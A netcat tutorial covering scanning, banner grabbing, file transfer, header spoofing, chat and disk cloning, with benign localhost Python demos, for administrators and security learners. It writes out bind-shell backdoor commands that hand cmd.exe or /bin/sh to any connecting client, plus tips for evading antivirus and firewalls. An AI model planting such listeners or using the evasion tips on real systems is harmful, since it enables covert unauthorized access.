Netcat (The Swiss Army Knife): useful commands.


In this tutorial we will go over the most useful netcat commands. Netcat is a tool that every IT professional should have in their toolbox, and if you are responsible for network or systems security it is essential that you understand what netcat can do. The original version of netcat is a UNIX program written by the author known as Hobbit, who released version 1.10 in March 1996. Netcat is available for Unix and for Windows.
Netcat is a simple but feature-rich networking utility that reads and writes data across network connections using TCP or UDP. It is designed to be a reliable "back-end" tool that can be used directly or driven by other programs and scripts. At the same time it is a network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities, including a port scanner, a listener that hands the connection to a program (which is what makes it a backdoor), a port redirector, file transfer and much more. Let's see what we can do with netcat.

Tips for using netcat on Windows:

Here are some tips for keeping netcat inconspicuous on a system or for using it through a firewall.

* Rename the executable, or compile it yourself (most antivirus products flag the stock nc.exe by signature)
* Detach from the console with the -d option (a Windows-build option), so no window is left open
* Listen on a well-known port that firewalls already allow, such as 80 or 443

Port scanner: netcat does not have the features that nmap offers, but if you just want to see which TCP ports are open it will do the job. The command below scans the target from port 1 to 150: -z tells netcat to connect without sending any data, -w 2 gives up on a port after two seconds, and -v makes it report what it finds (add -n to skip DNS lookups). Note that every probe completes a full TCP handshake, so the scan shows up in the target's logs.

nc -v -w 2 -z 192.168.10.10 1-150

Banner Grabbing: if you want to know what software is answering on port 80 (HTTP) or 21 (FTP), and from that make a guess at the operating system, you can use netcat to grab the banner. An FTP server greets you as soon as you connect, but a web server waits for a request, so you have to type something; even the malformed `GET HTTP` typed below is enough, because the error page still carries the Server header.

nc -v -n 192.168.10.10 80
(UNKNOWN) [192.168.10.10] 80 (?) open
GET HTTP

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Sat, 07 June 2008 20:50:04 GMT
Content-Type: text/html
Content-Length: 87

ErrorThe parameter

Microsoft-IIS/5.0 tells you this is almost certainly a Windows 2000 box, since IIS 5.0 shipped with it. Keep in mind that banners can be changed or removed by the administrator, so treat them as a hint rather than proof.
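As an added example (not from the original post), here is the same two-step workflow, a connect scan followed by a banner grab, written in Python so you can see exactly what the -z probe and the request do on the wire. It runs against a throw-away listener on 127.0.0.1 whose reply is constructed to mirror the IIS 5.0 transcript above and is returned whatever it is sent; the host, ports and banner are assumptions, and the client sends a well-formed HTTP/1.0 request rather than the bare `GET HTTP`.

```python
import socket
import threading

# Constructed reply, modelled on the IIS 5.0 error page in the transcript above.
FAKE_BANNER = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 0\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)


def start_fake_server(host="127.0.0.1"):
    """Listen on an ephemeral port and answer every client with FAKE_BANNER,
    whatever it sends. Returns the port so the scanner has something to find."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.settimeout(2)
                try:
                    conn.recv(4096)          # read (and ignore) the request, if any
                    conn.sendall(FAKE_BANNER)
                except OSError:              # -z probes hang up without sending
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def connect_scan(host, ports, timeout=2.0):
    """What `nc -v -w 2 -z host 1-150` does: a full TCP handshake per port and
    no payload. Returns the open ports, sorted. Each probe completes the
    handshake, so the target sees (and can log) every one of them."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 means connected, else errno
                open_ports.append(port)
    return sorted(open_ports)


def grab_banner(host, port, timeout=2.0):
    """Send a minimal HTTP/1.0 request and return the response headers as a
    dict keyed by header name, plus the status line under 'status'. HTTP/1.0
    needs no Host header and tells the server to close, so reading stops at
    EOF instead of hanging on a keep-alive connection."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"GET / HTTP/1.0\r\n\r\n")
        raw = b""
        while b"\r\n\r\n" not in raw:
            try:
                chunk = s.recv(4096)
            except OSError:                       # timeout or reset: use what we have
                break
            if not chunk:
                break
            raw += chunk
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {"status": lines[0]}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


if __name__ == "__main__":
    port = start_fake_server()
    # Scan a small window around the listener, the way the post scans 1-150.
    for p in connect_scan("127.0.0.1", range(port - 2, port + 3)):
        print(p, "open, Server:", grab_banner("127.0.0.1", p).get("Server"))
```

The scanner is a plain connect scan, which is also why netcat is no substitute for nmap: there is no SYN scan, no service fingerprinting beyond what the banner says, and nothing to stop a noisy scan from filling the target's logs.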

Backdoor: if you want to use it as a backdoor to get a remote command prompt or shell, on Windows:

nc -L -p 1001 -d -e cmd.exe

The -L option ("listen harder", Windows build only) tells netcat to go back to listening after a client disconnects instead of exiting, -p specifies the port netcat listens on, -d detaches it from the console so no window is left behind, and -e names the program to run once a connection is made, in this case cmd.exe (the command prompt), with its input and output wired to the socket.

and on Unix/Linux systems:

nc -l -p 1001 -e /bin/sh

Two caveats. First, -e only exists in builds compiled with it (the GAPING_SECURITY_HOLE option in Hobbit's source); the netcat-openbsd package that is the default nc on Debian and Ubuntu does not have it at all, while Nmap's ncat offers the same thing as `ncat -l 1001 -e /bin/sh`. Second, whichever tool you listen with, anyone who can reach the port gets the shell: there is no authentication and no encryption, so treat this strictly as a lab tool.

to connect to 192.168.10.10, issue this command

nc 192.168.10.10 1001

File Transfer: let's say you want to copy a file from one machine to another.

on the receiving host 192.168.10.10

nc -l -p 1001 > file.txt

on the sending machine

nc 192.168.10.10 1001 < file.txt

Depending on the build, the sending netcat may sit there after the last byte instead of closing the connection; -q 1 (available in the Debian/Ubuntu builds) makes it quit one second after end of input, which in turn lets the receiving side exit. Netcat does no integrity checking of its own, so run sha256sum (or md5sum) on file.txt at both ends and compare before trusting the copy.

Spoofing HTTP Headers: you can use netcat to talk to a web server with completely made-up headers. You type the request line and every header yourself: User-Agent, Referer (note the spelling, that is the name the HTTP spec uses, and a header called Referrer is silently ignored) and so on. It is useful when you want to generate hits that are easy to pick out of the server logs, or to see how an application reacts to headers a browser would never send:

C:\>nc ubuntu-box 80
GET / HTTP/1.1
Host: myhost.com
User-Agent: not-your-business
Referer: not-your-business

Netcat sends each line as you type it, but the server reads until it sees an empty line before it answers, so hit return twice when you are done. You will then get the response headers and HTML streaming down your screen. With HTTP/1.1 the server keeps the connection open afterwards, so either add a Connection: close header or press Ctrl-C once you have what you need.

HTTP/1.1 200 OK
Date: Sun, 08 Jun 2008 01:04:02 GMT
Server: Apache/2.2.8 (Ubuntu)
Last-Modified: Wed, 07 May 2008 19:33:34 GMT
ETag: “d3a11-2d-44ca90a5e9f80”
Accept-Ranges: bytes
Content-Length: 45
Content-Type: text/html
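Added example (not part of the original post) showing the other end of this trick: the request is assembled from the headers you choose and delivered to a throw-away listener on 127.0.0.1 that formats what it received as an Apache "combined" access-log line, so you can see the spoofed User-Agent and Referer land in the log verbatim. The hostname myhost.com and the 200 status and 45-byte size are taken from the transcript above; the listener itself and the log format are assumptions.

```python
import socket
import threading
from datetime import datetime, timezone


def build_request(host, path="/", method="GET", headers=None):
    """Assemble the exact bytes you would type into `nc host 80`. Note the
    spelling Referer (the name in the HTTP spec) and the empty line that
    terminates the header block: without it the server keeps waiting."""
    hdrs = {"Host": host, "Connection": "close"}
    hdrs.update(headers or {})
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in hdrs.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def combined_log_line(client_ip, raw_request, status=200, size=45, when=None):
    """Render one request in Apache/nginx 'combined' log format; the last two
    quoted fields are the Referer and User-Agent exactly as the client sent
    them. status and size default to the values in the transcript above."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    when = when or datetime.now(timezone.utc)
    stamp = when.strftime("%d/%b/%Y:%H:%M:%S %z")
    return (f'{client_ip} - - [{stamp}] "{request_line}" {status} {size} '
            f'"{headers.get("referer", "-")}" "{headers.get("user-agent", "-")}"')


def start_logging_server(host="127.0.0.1"):
    """Accept one connection, answer with a minimal 200, and keep the log
    line it would have written. Returns (port, list_that_receives_the_line)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(1)
    seen = []

    def serve_one():
        conn, addr = srv.accept()
        srv.close()
        with conn:
            conn.settimeout(5)
            raw = b""
            while b"\r\n\r\n" not in raw:        # headers end at the blank line
                chunk = conn.recv(4096)
                if not chunk:
                    break
                raw += chunk
            seen.append(combined_log_line(addr[0], raw))
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n"
                         b"Connection: close\r\n\r\n")

    threading.Thread(target=serve_one, daemon=True).start()
    return srv.getsockname()[1], seen


def send_request(port, raw_request, host="127.0.0.1", timeout=5):
    """Push the request bytes down a socket, the way nc does, read the reply
    until the server closes, and return its status line."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(raw_request)
        reply = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            reply += chunk
    return reply.split(b"\r\n", 1)[0].decode()


if __name__ == "__main__":
    port, seen = start_logging_server()
    req = build_request("myhost.com", headers={
        "User-Agent": "not-your-business", "Referer": "not-your-business"})
    print(send_request(port, req))
    print(seen[0])
```

The same function that makes your test hits easy to find is the reason log-based detections and analytics should never trust these two fields: they are whatever the client chose to send.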

Chat Server: if you need a quick and easy chat between two machines without installing an IM client, start listening on one of them, here 192.168.10.10:

nc -l -p 1001

on the other machine, connect with the command below and start typing; each line is shown on the other side when you press enter, in both directions. Like everything else here, it goes over the wire in clear text.

nc 192.168.10.10 1001

Hard Drive Cloning Over the Network: to clone an entire disk or just a partition, the source must not be mounted while it is read, so it is good practice to boot the system from a live CD and create the image from there.

on the receiving machine (/dev/sda here is the disk that will be overwritten, so make sure it is not the one the live system is running from and that it is at least as large as the source)

nc -l -p 1001 | dd of=/dev/sda bs=4M

on the system you want to clone

dd if=/dev/sda bs=4M | nc 192.168.10.10 1001

The bs=4M is optional but worth having: with dd's default 512-byte blocks the copy takes far longer. As with the file transfer, the listening netcat only exits when the sender closes the connection, so use -q 1 on the sending side if your build supports it. Verify the clone afterwards by hashing both disks (sha256sum /dev/sda on each side; if the target is larger than the source, hash only the first source-size bytes with head -c).
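Added example (not from the original post) covering both the file transfer above and this disk clone: a receiver that writes an incoming stream to a sink until the sender closes, a sender that streams a source in 1 MiB chunks, and the verification netcat does not give you, a SHA-256 computed on each end and compared at the finish. The "disk" is a constructed in-memory byte string and the target an in-memory buffer, so it runs offline; for a real clone, source and sink would be the block devices opened with open(..., 'rb') and open(..., 'wb'), or dd on either side.

```python
import hashlib
import io
import socket
import threading

CHUNK = 1 << 20                       # 1 MiB reads, like bs=1M for dd

# Constructed stand-in for /dev/sda: 1 MiB of a repeating byte pattern.
FAKE_DISK = bytes(range(256)) * 4096


def receive_stream(sink, host="127.0.0.1"):
    """`nc -l -p 1001 | dd of=...`: listen on an ephemeral port, copy one
    connection's bytes into `sink` until the sender closes, and hash them on
    the way. Returns (port, done_event, result); result gets 'bytes' and
    'sha256' when the transfer finishes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(1)
    done, result = threading.Event(), {}

    def serve_one():
        conn, _ = srv.accept()
        srv.close()
        digest, total = hashlib.sha256(), 0
        with conn:
            while True:
                chunk = conn.recv(CHUNK)
                if not chunk:         # sender closed: the only "end of image" signal
                    break
                sink.write(chunk)
                digest.update(chunk)
                total += len(chunk)
        sink.flush()
        result.update(bytes=total, sha256=digest.hexdigest())
        done.set()

    threading.Thread(target=serve_one, daemon=True).start()
    return srv.getsockname()[1], done, result


def send_stream(port, source, host="127.0.0.1"):
    """`dd if=... | nc host port`: stream `source` in CHUNK-sized reads, then
    shut down the write side, which is what tells the receiver it has
    everything. Returns (bytes_sent, sha256) for comparison with the far end."""
    digest, total = hashlib.sha256(), 0
    with socket.create_connection((host, port)) as s:
        while True:
            chunk = source.read(CHUNK)
            if not chunk:
                break
            s.sendall(chunk)
            digest.update(chunk)
            total += len(chunk)
        s.shutdown(socket.SHUT_WR)
    return total, digest.hexdigest()


def clone(source, sink, timeout=60):
    """Run both ends and return True only if byte count and digest agree,
    the same check as running sha256sum on both disks after a real clone."""
    port, done, received = receive_stream(sink)
    sent, sent_sha = send_stream(port, source)
    done.wait(timeout)
    return received.get("bytes") == sent and received.get("sha256") == sent_sha


def demo_clone(data=FAKE_DISK):
    """Clone the constructed disk into an in-memory target.
    Returns (verified, bytes_received)."""
    sink = io.BytesIO()
    ok = clone(io.BytesIO(data), sink)
    return ok, sink.getvalue()


if __name__ == "__main__":
    ok, image = demo_clone()
    print("verified:", ok, "bytes:", len(image))
```

The point of hashing on both ends is that a TCP stream that ends early (a sender killed mid-copy, a netcat that hung up on a timeout) looks exactly like a finished one to the receiver; only the byte count and digest tell you the image is complete.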

Conclusion: netcat is a tool every IT professional should be familiar with; it is a good way to test the security of your network, from firewalls and routers to the operating systems behind them. Use it with caution, and I do not suggest leaving it installed in a production environment: the same -e listener you used for testing is a ready-made backdoor.
